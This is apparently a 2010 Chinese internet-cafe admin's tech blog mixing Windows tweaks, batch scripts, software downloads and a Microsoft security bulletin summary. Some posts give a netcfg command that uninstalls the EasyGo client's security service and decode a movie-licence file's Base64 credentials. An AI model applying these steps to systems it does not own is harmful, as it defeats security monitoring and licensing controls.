　　先在“运行”对话框中输入“gpedit.msc”，回车之后打开本地组策略编辑器；然后依次展开“计算机配置→管理模板→Windows 组件→Internet Explorer”分支；再双击右边的“阻止显示Internet Explorer搜索框”选项，打开“阻止显示Internet Explorer搜索框”窗口；最后勾选该窗口中的“已启用”单选框并单击“确定”按钮即可。

　　这样一来，在打开的网页中大家就会发现IE8工具栏中的搜索框已经消失了，界面也变得更清爽了！怎么样，现在的IE8更像IE6了吧？感兴趣的朋友不妨一试。

QQ微博邀请码自动获取软件

180045@163.com(毒药) — Sat,22 May 2010 10:23:08 +0800

又发神经了，搞了这个东东，省得去谷歌慢慢泡了。

===================================
软件版本：1.0.0.0
软件语言：简体中文
软件大小：323 KB
软件授权：免费软件
运行环境：2000/XP/2003/VISTA/WIN7
更新时间：2010-05-22 10:30
===================================

使用说明：

没什么可说的，简陋的代码而已。

点击下载此文件

谷歌LOGO——吃豆子（哈哈，很好玩）

180045@163.com(毒药) — Fri,21 May 2010 23:39:54 +0800

PC-MAN 30周年，快点去玩下吧。

禁用批处理CMD窗口的关闭按钮

180045@163.com(毒药) — Wed,19 May 2010 16:58:21 +0800

在平时批处理应用中，相信大家也遇到过批处理未运行完就被客人关闭的情况，通常我们会选择用VBS调用批处理实现隐藏的效果，但有时候需要显示文字而又不想批处理被强制结束，那么gray.exe就派上用场了：

用法：

复制内容到剪贴板程序代码

@echo off
start /b gray.exe
echo This is a test
echo.
REM 不杀gray.exe pause就没反应了，在怎么者也推不出来
taskkill /f /im gray.exe >nul
pause

GRAY一定要放到最后杀，杀了gray后能退出了，否则会发现右键点击状态栏中的批处理时，X 又出现了。缺点就是grey.exe 不能自己退出（好像没什么参数）。

点击下载此文件

一句批处理移动同类文件

180045@163.com(毒药) — Fri,14 May 2010 05:17:36 +0800

有时候我们下载东西（例如图片，下面以图片为例）时通常会碰到分N个压缩包（不是分卷哈）的情况，每个压缩包又含有N个文件夹，每个文件夹里又各有一张图片，若采用人工操作移动这些图片到同一目录，既费时又费力，其实用一句批处理就可以达到目的。

复制内容到剪贴板程序代码

for /f "delims=*" %%i in ('dir /b /s *.jpg') do move %%i %cd%\

*.jpg：操作类型

%cd%：批处理当前路径

提取易游用户磁盘

180045@163.com(毒药) — Fri,14 May 2010 04:28:57 +0800

分服务端和客户端

服务端：Templates文件夹、US.exe、UserSpace.exe

客户端：BaseSeting.ini（服务端IP配置）、Menu.exe（主程序）、udFast.exe、Userdisk.dll、UserLogon.exe

客户端EXE源文件采用了ASPack 2.12压缩，可以用waspack脱壳。

小巧的用户存档，用在黑吧上也不错。

千脑网盘下载地址:易游用户磁盘

网站备案拍照又掀波澜，站长接入商需联签承诺书

180045@163.com(毒药) — Thu,13 May 2010 03:26:36 +0800

这两天关于网站备案、现场拍照的话题又重新被讨论了。相较于以前理论上的讨论，昨天从国内网站接入商处获悉，网站备案拍照工作已经开始进行正式执行阶段”，不知道这次说的“正式执行”会落实到什么程度，毕竟，大多数人对此还是观望中，对这个政策没有太多好感。

据搜狐IT所述，网站备案拍照工作正式执行后，网站主办者除需赴接入商处拍照备案外，还需与接入商共同签署信息真实承诺书，方可完成网站信息真实性核查工作。同时，工信部已公布了网站备案拍照背景原始图和拍照背景使用说明图，此举表明工信部已经网站备案站长须拍照列入工作日程。

　　一家接入商告诉搜狐IT，目前正按照工信部发布的64号文件《工业和信息化部关于进一步落实网站备案信息真实性核验工作方案(试行)通知》执行拍照等相关工作。

　　搜狐IT获悉，对于接入商来说，首先需在原始背景图的基础上，在图示中指定位置按要求添加该单位公司名称，将添加好公司名称的图片作为核验过程中拍照实际背景，同时将带有公司名称的拍照实际背景图片按原始比例印制成不小于1600mm×1600mm的拍照背景，作为对网站负责人现场拍照的背景幕布。

　　根据64号文件规定，对于网站主办者来说，网站主办者在接到通知后，由网站负责人本人携带核验所需证件原件、材料到接入服务单位备案现场办理核验手续。

网站负责人实际拍照效果图

　　相关文件显示，网站主办者需要拍摄彩色正面免冠半身照，包含网站负责人和拍照背景中本单位的名称。接入商确认网站负责人和本单位公司名称清晰可见后将照片留存，并且需要显示拍照时间模式，照片分辨率设置为800*600像素。

　　此外，在拍照完成后，网站主办者与接入商还需填写网站备案信息真实性核验单，并对信息真实性进行联合承诺。

　　主办者需要填写包括域名、姓名和网站类型在内的三项基本信息。接入商则需要对网站主体信息、联系方式、备案信息和接入信息报备等进行核验。核验完成后，双方需要共同签署信息真实保证书。

PowerBasic9.0中文汉化版

180045@163.com(毒药) — Mon,10 May 2010 05:24:02 +0800

       PowerBASIC是个编译器，它允许 BASIC 程序师使用熟悉的 BASIC 语言编写工业标准的动态连接库（DLLs）和可执行程序（EXEs）。
     PowerBASIC与熟悉的BASIC语言一样，但有两个重要的差别：通常PowerBASIC 编译的代码在性能上比VB 编译的代码好3到23 倍；以及由PowerBASIC 产生的可执行文件比VB生成的可执行文件小4 到40 倍！
　　使用PowerBASIC，源代码将被编译为本机可执行代码文件，并且不需要额外的外部运行时组件。



      千脑网盘下载地址:PowerBasic9.0中文汉化版

取消Pjblog半静态列表模式下的分类图标

180045@163.com(毒药) — Mon,10 May 2010 01:55:23 +0800

动态模式下是修改修改class/cls_default.asp文件

复制内容到剪贴板程序代码

If webLogArr(9,PageCount) Then %><%end If%>

到
复制内容到剪贴板程序代码
<%If CanRead Then%>

中的代码替换为：

复制内容到剪贴板程序代码

        " title="查看<%=getCate.cate_Name%>分类下的日志.">[<%=getCate.cate_Name%>]

半静态需要修改\Template\ArticleList.asp文件，找到

复制内容到剪贴板程序代码
" > 的日志" src="<$Cate_icon$>" style="margin:0px 2px -3px 0px"/>

改为：
复制内容到剪贴板程序代码
" title="查看 <$Cate_Title$> 的日志" style="margin:0px 2px -3px 0px"/>[<$Cate_Title$>]

对于像本站采用英文目录，因为长度不一影响美观，可以在\class\cls_logAction.asp找到

'======================================================
'半静态化
'======================================================
下的
    Temp1 = Replace(Temp1, "<$Cate_Title$>", getCate.cate_Name)
后加入以下字段
    Temp1 = Replace(Temp1, "<$Cate_Intro$>", getCate.cate_Intro)

还有

'======================================================
'缓存静态化列表
'======================================================
下的
    Temp2 = Replace(Temp2, "<$Cate_Title$>", getCate.cate_Name)
后加入以下字段
    Temp2 = Replace(Temp2, "<$Cate_Intro$>", getCate.cate_Intro)

再把上面红色字体的Cate_Title改为Cate_Intro。

这是用提示说明代替标题名称。

Google已经获得www.baidu.com.sb域名

180045@163.com(毒药) — Sun,09 May 2010 14:56:19 +0800
      互联网巨头之间总是有快意江湖故事，2010年5月7日晚，有网友向记者爆料：“google抢注了百度的域名，还是带sb的”。

      根据网友描述，记者登陆了“涉嫌”抢注的域名www.baidu.com.sb，该页面迅速指向google的全球页面http://www.google.com/，记者随即查证到，www.baidu.com.sb的IP指向：64.233.189.104，按照公开数据，为美国加利福尼亚州山景市谷歌公司所在地。而通过全球域名管理机构ICANN查询，sb域名是所罗门群岛国家顶级域名。另外记者也注意到google还持有www.google.com.sb域名。

      在中国大陆网络文化中，有网友经常把北京方言中的一句骂人话简化成：“SB”，有网友据此调侃此事，称google此举是在骂百度，但也有资深域名专家向记者称，“SB”仅仅是一个国际顶级域名，google抢注baidu.com.sb应该是出于商业考量。

      而据此间不愿具名的知识产权律师向记者介绍，近年，企业之间的域名争议诉讼越来越多，如美国杜邦公司就dupont.com.cn域名诉北京国网公司案件，最后北京法院判处后者撤销域名注册。该律师称，百度如就google此举进行诉讼，胜诉的可能性较大。

      截止至发稿时，记者未能联系上百度和google公司就此发表看法。

影著协回应质疑：未对网吧重复收费

180045@163.com(毒药) — Sun,09 May 2010 03:18:36 +0800
      昨天，针对舆论对中国电影著作权协会拟向全国网吧和长途车等收费的质疑，中国电影著作权协会回应称，中国电影著作权协会的收费资格受到法律保护，对网吧和长途车收的是著作权使用费，不属于双重收费。

　　4月21日，本报对中国电影著作权协会拟向全国网吧和长途车收费进行报道，并独家披露了收费标准，网吧拟收0.15元/天/台，全国长途车拟每车每天1元。消息一出，引起舆论的普遍质疑。

　　收费资格受双重保护

　　针对收费资格，中国电影著作权协会相关负责人表示，中国电影著作权协会是依照《著作权法》和《著作权集体管理条例》，经国家广播电影电视总局同意，报新闻出版总署批准，在民政部登记注册的中国境内唯一一家电影著作权集体管理组织，它可以受权利人委托向电影作品的使用者收取版权使用费，其合法性和唯一性受到司法和行政的双重保护。因此，该协会的收费资质合法。

　　网吧此前交的只是技术服务费

　　有些网吧负责人认为，已经向一些网络公司缴纳了服务费，如果电影著作权协会再收费就属于重复收费。

　　对此，中国电影著作权协会相关负责人回应称，部分网吧向提供片库的网络公司缴纳的费用不包括著作权使用费，只是技术服务费，因此必须另行缴纳使用费。如果有网络公司承诺其收取的服务费包括著作权使用费，那么，协会将会找该网络公司收取代收的著作权使用费，不再向网吧收取。

　　此外，长途车买了正版DVD碟片播放，但是注明了“仅供家庭播放”的碟片用于在公众场合播放盈利，就必须另行缴纳著作权使用费。

　　不强求网吧安装统一设备

　　此外，中国电影著作权协会的该负责人还告诉记者，网吧按机器数量收取0.15元/天/台的标准是按照每天每台电脑每小时缴纳上机费用的7.5%收取的，但在不同地区可以略作浮动。

　　该负责人还表示，协会不会强行要求网吧必须安装某厂家的播放收费监控技术和设备，网吧可以自由选择影片的播放模式和渠道。

      =================================
　　
      看到这则消息觉得无奈，老大爷们为了利益真的无所不用其极。当初网尚等公司进入网吧市场不也是打着版权的旗号？现在一句“只是技术服务费”就推倒了所有网吧，与电影提供商所签定的合同在势力面前只是个P。

      或许增大网吧带宽、提供在线电影网站才是王道，任它山雨欲来风满楼，我自岿然不动。

      网吧！蛋糕！

      已经不能叫蛋糕了~叫猪油糕吧~

博客换模板，导致收录下降

180045@163.com(毒药) — Sun,09 May 2010 02:30:08 +0800
      之前用小威的千变万化用了差不多一年咯，心血来潮就换成了现在这个 weisay Mono ，改动也不大吧，咋的谷歌由未改前的17页变成现在的6页，太闹心了吧。

五洲回响授权文件（licence.zkm）的加密方式

180045@163.com(毒药) — Sat,08 May 2010 15:31:17 +0800

      在五洲的目录下，我们知道有个licence.zkm，它是五洲回响电影系统的授权文件，很是奇怪，它只采用了BASE64的加密方式，一个标准的licence.zkm文件内容如下：

=============================

Fsem9rZW15c3
==cG9pc29uLm5ldC5jbg
U2MTIzND
==MjAxMC0wNS0xOA

=============================

将每行加密后的密文前面两位移到最后面，就变成：

em9rZW15c3Fs
cG9pc29uLm5ldC5jbg==
MTIzNDU2
MjAxMC0wNS0xOA==

通过BASE64解密出来，就是：

zokemysql
poison.net.cn （用户名）
123456（密码）
2010-05-18（过期时间）

      搞不懂啊搞不懂，既然是网络验证的，又何需将这个文件进行加密呢，就算真的需要加密，也复杂点嘛，起码搞个变形啥的。

      ps:它的网页也是采用JS+BASE64加密，一个鸟样。

从博客到微博的转变——5聊，真的很无聊

180045@163.com(毒药) — Thu,06 May 2010 04:48:50 +0800

      一直以来，我都不喜欢接受什么新生事物，微博盛行到今天，我也是一无所知。别人说到最近流行的QQ微博，我就一直搞不懂与QQ空间的区别，我从不指望能从别人的QQ空间里能找到关于对我有用的信息，这似乎是IT从业人士们的通病，拥有自己的空间或许会令自己更加专业一点。

      再扯回微博，刚才我还在感叹着为什么没有一个统一的标准把这些破烂罐儿一股脑儿地整合为一个标准、一个集合。嘿嘿~当年陈天桥好像也做过这事儿，盛大盒子的失败令我们领悟到不要试图在天朝建立一个王国，我们需要的是和谐，再者利益的冲突也决定了它的命运，市场还是那个市场，有市场就有战争。

      上面扯的远了些，现在我们来看看微博的定义：微博，即微博客（MicroBlog）的简称，是一个基于用户关系的信息分享、传播以及获取平台，用户可以通过WEB、WAP以及各种客户端组件个人社区，以140字左右的文字更新信息，并实现即时分享。这是在百度百科找来的信息，姑且不去考究是否正确，我在这个定义当中看到的重点就是“信息分享”，其最大的特点是方便快捷，无论是何时何地，你撒了一泡尿引发的一番感受都可以即时利用手中的通讯工具分享给他人。相反博客就没有那么方便了：文笔要考虑、字数要凑、含金量要足。另外微博还有个"follow"，化被动的关注为主动的跟随，这又令很多追星族们有了追求。对比两者，微博的草根性更强，是一个真正全民互动的平台。

      记得2000年的时候，我们听过这么一句话：“这是信息爆炸的年代。”，但到现在微博的兴起，似乎又造成了一个问题——信息日益碎片化，这就造成了我们去分析某一件事情的时候，必须采集大量的分片信息再主动的进行还原和分析，而博客就恰好相反，信息的高度集中可以省却“分析师”们的脑力劳动。

      如果要用一句话去概括微博，那就是：以个人面向网络的即时广播，通过群聚的方式，每个人都可以形成一个自己的听众群落；用微博客的方式，将个人的见解和观点发布给自己的听众，以最精炼的词汇来表达最高深的观点。微博三言两语的即时表达方式很符合现今的“快餐文化”，不过也有一些人士认为它只是无聊人类消遣的工具，它走的是一条与博客相反的道路。至于这条路究竟通往何处？最终能否取代博客的地位？一切需要时间去考证~

      嗦哆了这么久，你就会发觉我不是那么的喜欢微博。的确嘛，你看上面那么多字用微博发起来多麻烦……闷骚男！

       闲聊时间，向大家推介个微博——follow5，5步大同的功能实在是太强大了，基本上国内所有微博都可以同步，还支持QQ、MSN、飞信等即时聊天工具。大家下载一试便知。

FOLLOW5官方插件

      桌面客户端：5聊（图）

      手机客户端：iFollow for WindowsMobile

      手机客户端：5魅（魅族专用版）

      手机客户端：iFollow for Symbian

      和信推客

      5秀

      5步大同

      5享

      5Feed

      5要存





PUBWIN2007同步代理提示失败

180045@163.com(毒药) — Wed,05 May 2010 01:30:10 +0800
       闲话不说了，上图吧！


       重装控制台后再装同步代理（0710版本）就出现了这个错误了，装080403的版本就没有提示出错，但PUBWIN后台老是提示第三方同步代理失败。

       重新注册实名！失败！

       改COM号！失败！好像与同步代理无关吧。

       查看别的网吧安装包，也是这个旧版......

       最后，把别的网吧的用着的目录整个拷过来，问题解决~

       太有才了。

       什么玩意儿！

ps: 注册失败的请开放封锁的广告IP。

如果这是男声

180045@163.com(毒药) — Tue,04 May 2010 14:03:38 +0800

     快男2010成都赛区川音学生刘著

     这是伪娘么？我们姑且不从性别上去观察，单从声音角度上来说，虽然不算震撼，但狠是惊艳。他（她）的唱功很nice~——当然这是站在我这等业余爱好者的立场上的观点。只是评委太没素质了，一首原创曲目下来被打断多次，副歌结尾时可能是由于评委施加的压力越来越大导致音准不稳了。

    从头到尾，且看那位安妮玫瑰的雷人语句：

    那我希望网友对你进行人肉搜索——人肉不是由你这位大妈来决定的，这是群体性的力量。

    你可以用你的人格去保证吗？——对别人的尊重是最基本的人格，连人格都失去了，你又有什么权利去质问别人呢？

    太多不说了，咱们听听歌吧。

   忘了当年超女~不知评委们有没有对她（他）验明正身呢！

   PS：完整版的《飘》，KORG合成器~神器！

用Netcfg卸载易游cowman network

180045@163.com(毒药) — Tue,04 May 2010 02:17:42 +0800
       前几天在玩WINPE时无意中对这个netcfg.exe产生了兴趣，本着无聊的心态测试了一番，吗的！牛人不牛了。
问题：cowman network 是什么？

回答：cowman network是安装易游客户端后，特有的驱动级安全中心防火墙——即牛人网络服务。

复制内容到剪贴板程序代码

netcfg -v -s n ;//显示协议、服务等

返回信息：
Network Adapters
-----------------

pci\ven_10ec&dev_8168&subsys_90361695 Realtek RTL8168/8111 PCI-E Gigabit E
t NIC

Network Protocols
-----------------

ms_nwspx                   NWLink SPX/SPXII Protocol

ms_nwnb                    NWLink NetBIOS
.......................................;//略
Network Services
-----------------

bk_imfilter                CowMan Network Service

ms_psched                  QoS ms_rsvp                    QoS RSVP

.......................................;//略
Network Clients
-----------------

ms_msclient                Microsoft ms_webclient               WebClient

红色字体就是cowman network，再执行以下命令：

复制内容到剪贴板程序代码

netcfg -v -u bk_imfilter ;卸载cowman network

返回信息：
Trying to uninstall bk_imfilter ...

...done.

*** You need to reboot your computer for this change to take effect ***

再看看网络连接里，cowman network服务已经卸载掉了，管理端里当前客户机显示为未连接状态。

天气很闷热~

大家是不是都读错了光纤二字？

180045@163.com(毒药) — Mon,26 Apr 2010 06:55:47 +0800
“光纤”的意思是“光导纤维”

纤维的解译和读音是：

音：xiān wéi

纤维（Fiber）：聚合物经一定地机械加工（牵引、拉伸、定型等）后形成细而柔软地细丝,形成纤维。

那么 “光纤”正确读音应该是：GUANG XIAN

但在现实中，我只听过一种读音，那就是 Guang Qian (光千)

有点汗~我错鸟！

QQ概念版在WIN7下的问题与亮点

180045@163.com(毒药) — Mon,26 Apr 2010 06:16:05 +0800
      QQ概念版这阵子也太火了，毒药也不能免俗啊，所以就狠狠的恶俗了一把。谁知道下载回来装上后就碰上了一个BUG~如下图：

而正常情况下的登陆框应该是这样：

还有主菜单栏里也有几项好像是完全透明的，还真概念哦~

      苦思不果，最后无意间看某帖出现了一模一样的问题，发帖人倒是自己找到了办法，原来就是N卡驱动问题！兜来兜去原来——咋的~就是驱动问题。因为我用的一直是WIN7官方的显卡驱动，这回也就到微软更新里找到了相对应的补丁。

nVidia - Display - NVIDIA GeForce 7300 GT

更新类型: 可选

nVidia Display software update released in September, 2009

详细信息:
http://winqual.microsoft.com/support/?driverid=20322269

帮助和支持:
http://support.microsoft.com/select/?target=hub

最后发现了这QQ概念版的唯一亮点，嘿嘿，上图：



直接在面板里把好友拖到桌面上，哈~好玩！

Win7 服务按需优化批处理

180045@163.com(毒药) — Mon,26 Apr 2010 04:46:36 +0800
      无意间在远景找到的，看了下代码觉得还不错，写这批处理的仁兄还挺有耐心的哦。
      这个批处理文件有以下功能：备份当前服务、还原系统默认服务、按需定制优化服务三种功能，绝对让你的系统跑起来更流畅，内存占用更小。
      介绍：默认开启AERO，开启自动更新（检查更新但让我选择是否下载和安装）。其他的服务，可以具体的根据自己的需要来定制。

点击下载此文件

Microsoft 安全公告摘要（2010 年 4 月）

180045@163.com(毒药) — Sun,25 Apr 2010 05:11:00 +0800
本公告摘要列出了 2010 年 4 月发布的安全公告。

摘要

下表概述了本月的安全公告（按严重性排序）。

有关受影响软件的详细信息，请参阅下一节“受影响的软件及其下载位置”。

MS10-019 Windows 中的漏洞可能允许远程执行代码 (981210)

此安全更新解决 Windows Authenticode 验证中可能允许远程执行代码的两个秘密报告的漏洞。成功利用此漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。
严重
远程执行代码
Microsoft Windows

MS10-020 SMB 客户端中的漏洞可能允许远程执行代码 (980232)

此安全更新解决 Microsoft Windows 中一个公开披露的漏洞和若干个秘密报告的漏洞。如果攻击者将特制的 SMB 响应发送到客户端发起的 SMB 请求，此漏洞可能允许远程执行代码。要利用这些漏洞，攻击者必须诱使用户建立与特制的 SMB 服务器的 SMB 连接。
严重
远程执行代码
Microsoft Windows

MS10-025 Microsoft Windows Media Services 中的漏洞可能允许远程执行代码 (980858)

此安全更新解决在 Microsoft Windows 2000 Server 上运行的 Windows Media Services 中秘密报告的漏洞。如果攻击者将特制的传输信息包发送到运行 Windows Media Services 的 Microsoft Windows 2000 Server 系统，此漏洞可能允许远程执行代码。采用防火墙最佳做法和标准的默认防火墙配置，有助于保护网络免受从企业外部发起的攻击。按照最佳做法，应使连接到 Internet 的系统所暴露的端口数尽可能少。在 Microsoft Windows 2000 Server 上，Windows Media Services 是可选组件，在默认情况下并未安装。
严重
远程执行代码
Microsoft Windows

MS10-026 Microsoft MPEG Layer-3 编码解码器中的漏洞可能允许远程执行代码 (977816)

此安全更新解决 Microsoft MPEG Layer-3 音频编码解码器中秘密报告的漏洞。如果用户打开包含 MPEG Layer-3 音频流的特制的 AVI 文件，此漏洞可能允许远程执行代码。如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
严重
远程执行代码
Microsoft Windows

MS10-027 Windows Media Player 中的漏洞可能允许远程执行代码 (979402)

此安全更新可解决 Windows Media Player 中一个秘密报告的漏洞。如果 Windows Media Player 打开恶意网站上特制的媒体内容，此漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
严重
远程执行代码
Microsoft Windows

MS10-021 Windows 内核中的漏洞可能允许特权提升 (979683)

此安全更新可解决 Microsoft Windows 中许多秘密报告的漏洞。如果攻击者本地登录并运行特制应用程序，其中最严重的漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据并能本地登录才能利用这些漏洞。匿名用户无法利用这些漏洞，也无法以远程方式利用这些漏洞。
重要
特权提升
Microsoft Windows

MS10-022 VBScript 中的漏洞可能允许远程执行代码 (981169)

此安全更新解决 Microsoft Windows 上的 VBScript 中可能允许远程执行代码的公开披露的漏洞。对于 Microsoft Windows 2000、Windows XP 和 Windows Server 2003，此安全更新的等级为“重要”。在 Windows Server 2008、Windows Vista、Windows 7 和 Windows Server 2008 R2 上，无法利用这个容易受到攻击的代码，但由于存在该代码，所以此更新将作为纵深防御措施提供，并且没有严重等级。

如果恶意网站在网页上显示特制的对话框，并且用户按了 F1 键，导致以攻击者提供的 Windows 帮助文件启动 Windows 帮助系统，则此漏洞可能允许远程执行代码。如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。
重要
远程执行代码
Microsoft Windows

MS10-023 Microsoft Office Publisher 中的漏洞可能允许远程执行代码 (981160)

此安全更新解决了 Microsoft Office Publisher 中一个秘密报告的漏洞，如果用户打开特制的 Publisher 文件，则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
重要
远程执行代码
Microsoft Office

MS10-024 Microsoft Exchange 和 Windows SMTP 服务中的漏洞可能允许拒绝服务 (981832)

此安全更新解决 Microsoft Exchange 和 Windows SMTP 服务中一个公开披露的漏洞和一个秘密报告的漏洞。如果攻击者将特制的 DNS 响应发送到运行 SMTP 服务的计算机，其中最严重的漏洞可能允许拒绝服务。默认情况下，Windows Server 2003、Windows Server 2003 x64 Edition 或 Windows XP Professional x64 Edition 上未安装 SMTP 组件。
重要
拒绝服务
Microsoft Windows、Microsoft Exchange

MS10-028 Microsoft Visio 中的漏洞可能允许远程执行代码 (980094)

此安全更新解决 Microsoft Office Visio 中两个秘密报告的漏洞。如果用户打开特制的 Visio 文件，这些漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
重要
远程执行代码
Microsoft Office

MS10-029 Windows ISATAP 组件中的漏洞可能允许欺骗 (978338)

此安全更新解决 Microsoft Windows 中一个秘密报告的漏洞。对于 Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008，此安全更新的等级为“中等”。由于 Windows 7 和 Windows Server 2008 R2 包含由此安全更新部署的功能，所以这些操作系统不容易受到攻击。

此漏洞可能允许攻击者欺骗 IPv4 地址，以便它可绕过依赖源 IPv4 地址的筛选设备。通过更改 Windows TCP/IP 堆栈检查经过隧道传输的 ISATAP 数据包中的源 IPv6 地址的方式，此安全更新解决了漏洞。
中等
欺骗
Microsoft Windows

十个坚持博客的理由

180045@163.com(毒药) — Thu,22 Apr 2010 04:05:41 +0800
      要知道，坚持一件事很难，当你写了一二年的博客之后发现自己的博客点击还是那么一点点，读者还是那几个人，收入基本为零的时候，你是不是在考虑要不要坚持下去呢?看看下面我整理出来的坚持博客的十个理由吧? !

　　另外，如果你决定放弃博客了，那么，可以看看我的另外一篇文章，放弃博客的十个理由。反正，一切皆有可能，一切也皆可以找到理由。

      一：写博客就象小资生活一样。如果一个人有个网站，在内行人眼中，是不值一提的，稍稍懂点东西就可以做出几个站。但博客就不一样了，不会写点东西是不成的，没点知识也是不行的。在外行人眼中，博客是自己的门面，你的才华你的骄傲都可以通过博客来展现。所以，写博客如做小资，享受快乐，也可以独享快乐!而做网站如淘金，成功了固然令人羡慕，失败的却不会让人同情。功利心，在写博客的一个群体中，只是占了一小部分。 ..

　　二：博客让我们自信。在网上随便找个人聊聊，不是打游戏就是聊QQ。其实很没有自信。写博客让人站高一层：我在网上写博客。喔。写博客。。。那不是一般人可以玩的。与其沉溺于网游，不如搞搞博客。即使我们并不一定能成为一个出色的博客人，也不一定有成为出色的博客人的潜质，那也没有关系。每个博客都有可取之处。你所要做的，或者需要做的，是找出自己写博的理由，你的博客的可取之处。 ...

　　三：博客是才子的居屋。在没有博客的时代，才子是骄傲的，可能会在网络中大出风头。但这些只能在别人架设的规则里进行，或者论坛，或者网站。这多少有些不方便。能在网上有个自己的地方，曾经是多少达人的梦理啊。比如说我，开个玩笑。博客不需要技术，正在这些才子所需要的。当你的精彩文章四处散落的时候，如果有个地方既可以汇集你的精彩，又可以让别人阅读，那无疑是令人愉快的。 .

　　四：博客是平民的天堂。平民和平民化，这本身代表着一种对话语权的不充足情绪。当社会精英和媒体把持着话语权的时候，掩蔽着事实，主导着社会声音的时候，博客让我们有了说话的地方，虽然烟论知由并没有真正的实现。注意，那个烟论知由是我故意写错的。 ..

　　五：博客让我们充满希望。好奇怪。其实我并不喜欢希望这两个字。当这两个字出现的时候，那说明我们还没有成功。但确实如此，博客只能让我们充满希望。一个网民想出名，想赚些生活费，又不懂技术，又没有时间，那博客无疑是寄托我们希望的产物。如果你写得好但又不是太好，想博出名又不愿意将自己的衣服脱光，那么就写博客吧，金子至少可以在自己的博客这一块，发出光彩。就算是镀金也好。如果你写得不好，那也可以表达一些对周围亲朋的爱意，对生活的意见，这些，都可以给自己给周围的人带来愉快的经历。 ..

　　六：写博客可以培养你的持续性。什么事都需要有个计划，写博客其实也一样。虽然我们可能并没有给自己定下什么目标，但有个博客在那儿，有着一些朋友在哪儿看你的博客，这会促使你认真对待写博客这件事，并持续的写下去，坚持下去。如果你坚持不下去了，不防搜索一下梁兄的这篇文章。来坚定你的信心。

　　七：写博客可以培养你良好的心态。这年头多了很多种族，比如穷忙族，整天忙忙碌碌，不知道自己在做什么。人成了社会的一个钉子，没有了自我，没有了思想。而博客，可以让我们记起自己，让我们还能看到自己内心深入那仅存的一点点或安静或温柔的情绪。 !

　　八：博客让我们可以经常整理自己的思想。有些话是不能说的，有些话是说不出口的，有些思想是火花，只是在那一瞬间撞击出来。成长与成熟，是持续的。经常的写博客，可以让我们整理自己的思想，留下自己思想的火花和成就感。 ..

　　九：博客让我们做自己想做的人。是的，做自己想做的人，而不是做自己。其实无论是社会还是博客，我们总是不能做自己。在社会上，你可能会保持着斗志，对每一次的社交如履薄冰，这个时候你未必能做想做的自己。而在网络上，你可以做你想做的自己。或者你想做个才子，或者你想做个评论家，这都有可能。你愿意做什么样的人，由你决定，而不必考虑是否会考虑你的生活或者将来。

      十：博客让自己不再孤独。无论你是写什么样的博客，总会找个同好者。人是社会群休动物。寻找可以归属的群体，这会给我们带来安全感。

　　十一：我写上这个十一，其实是想说，做自己爱做的事，就可以了，不要将写博客当成一个任务，也不要将写博客当成一个目标。如果能从博客中得到一点点的快乐。足够了。也不要将自己的精力都投入到博客中，博客是生活的点缀，我们不是职业博客人，我们也不需要做一个专业的博客人。

查壳工具PEiD 0.94 For WIN7 版本

180045@163.com(毒药) — Wed,21 Apr 2010 01:59:31 +0800
    一直以来用的好好的PEiD在WIN7上居然提示不兼容，太那个啥了~！
   还好百度大神是无所不能的，找啊找就找着了，应该是某位牛人改进过的吧，反正能用就行了。

点击下载此文件

海豚音、绵羊音都已经过时了，惊世骇俗的“烈马音”登场

180045@163.com(毒药) — Thu,15 Apr 2010 01:06:24 +0800
百听不厌啊~淡定！

Flash动画
在线播放

批处理整理Hosts文件（删除无效链接、加快IE启动速度）

180045@163.com(毒药) — Tue,13 Apr 2010 21:47:28 +0800
      首先我们到死性不改的BLOGhttp://www.clxp.net.cn/article.asp?id=385下载最新的Hosts反黑文件，不看不知道，已经7000多条了，不过当中也有很多已经失效的链接，所以，整理一番还是必要的。
      思路：
删除注释和127.0.0.1和127.1等字符保存为temp.txt，再逐行ping主机，保存为hosts文件。

复制内容到剪贴板程序代码

@mode con cols=80 lines=25
@echo off
color 0a
title 反黑文件整理 Modify By: 毒药
setlocal EnableDelayedExpansion
set separator=--------------------------------------------------------------
:: 检测各主机
echo My Blog http://www.poison.net.cn
set /p result=请输入要处理的[路径]文本:
for /f "tokens=2 delims=# " %%i in (%result%) do echo %%i >> temp.txt
echo #2007+2008+2009-VSL(Virus,Site,List)病毒、垃圾网站屏蔽HOSTS文件(转载请保留版权) >> Hosts
echo #By:死性不改 >> Hosts
echo #My Blog http://www.clxp.net.cn >> Hosts

for /f %%a in (temp.txt) do (
    call :pinghost %%a
)
echo 检测完毕,按任意键将打开详细结果文件...
del temp.txt
pause > nul
notepad Hosts
exit

:: pinghost子程序
:pinghost
ping -n 1 -w 100 %1 >>nul
if %errorlevel%==0 (echo 127.1 %1 >> Hosts) else (echo ping %1 failed)

运行前请先行清空机器本身的hosts表。
弊端：采用了动态域名解析的网址多是二级域名，建议封顶级域名。
禁PING的服务器也当成失效链接。
再建议死性不改大哥：更新Hosts文件时，对不能PING通且存在的网址在注释里写明端口、路径等，方便整理。
PS：有时候AU3觉得麻烦的代码或者在批处理中就很好解决。

Radmin 自动连接(AU3版本)

180045@163.com(毒药) — Mon,12 Apr 2010 22:53:12 +0800
      练手之作，全仿天下网吧出品的那个 Radmin自动填密码工具，并增加了中介服务器功能，山寨的能力很好很强大。

软件简介：

===================================
软件版本：1.0.0.0
软件语言：简体中文
软件大小：822 KB
软件授权：免费软件
运行环境：2000/XP/2003/VISTA/WIN7
更新时间：2010-04-12 20:30
===================================

使用说明：

